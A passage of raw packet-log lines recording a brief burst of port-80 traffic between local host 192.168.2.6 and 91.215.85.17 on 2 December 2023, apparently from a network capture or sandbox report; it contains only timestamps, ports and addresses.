                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207416058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207423925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207438946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207448959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207469940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207490921 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207495928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207508087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207559109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207570076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207581043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207587957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207603931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207608938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207653999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207668066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207679987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207726955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207736015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207747936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207796097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207797050 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207808971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207859039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207860947 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207870960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207921028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207936049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207935095 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207958937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207979918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207982063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.207993984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208029985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208157063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208169937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208179951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208192110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208203077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208204031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208230972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208245993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208257914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208259106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208307981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208314896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208374023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208385944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208400011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208456993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208467960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208479881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208502054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208502054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208523989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208570957 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208617926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208630085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208638906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208652020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208657980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208664894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208692074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208736897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208765030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208775997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208781958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208787918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208852053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208853960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208954096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208966017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.208977938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209031105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209038019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209057093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209067106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209074020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209103107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209131956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209136963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209145069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209157944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209187984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209203959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209206104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209234953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209253073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209275961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209280014 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209289074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209300995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209312916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209327936 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209355116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209367990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209441900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209469080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209484100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209496975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209533930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209563971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209577084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209589005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209599972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209614038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209672928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209686041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209697962 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209701061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209712982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209724903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209750891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209780931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209793091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209805012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209899902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209911108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209923983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209934950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209944963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209958076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.209989071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210021019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210032940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210047007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210067034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210093975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210123062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210135937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210148096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210160017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210189104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210201979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210206985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210215092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210256100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210274935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210288048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210320950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210330963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210356951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210370064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210385084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210402966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210431099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210454941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210532904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210546017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210557938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210583925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210611105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210614920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210628033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210639000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210649967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210681915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210700035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210700035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210860014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210871935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210884094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210895061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210906029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210912943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210920095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210944891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210973024 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210974932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.210998058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211041927 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211061954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211074114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211085081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211113930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211148024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211159945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211170912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211194038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211221933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211225986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211239100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211251020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211261988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211273909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211287022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211292028 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211311102 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211330891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211359024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211373091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211421013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211425066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211436033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211448908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211460114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211479902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211508036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211543083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211556911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211568117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211581945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211600065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211630106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211658001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211672068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211683989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211695910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211716890 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211744070 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211771011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211783886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.211838961 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.212903023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.212917089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.212968111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.216892004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.217386007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.217499018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422422886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422447920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422460079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422472000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422492027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422532082 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422573090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422588110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422602892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422616959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422626972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422626972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422652006 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422699928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422713041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422724962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422734976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422749996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422760963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422770977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422813892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422831059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422844887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422857046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422894001 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422943115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422957897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422969103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422981024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.422996998 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423022032 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423053980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423069954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423082113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423091888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423104048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423106909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423137903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.423152924 CET804972091.215.85.17192.168.2.6
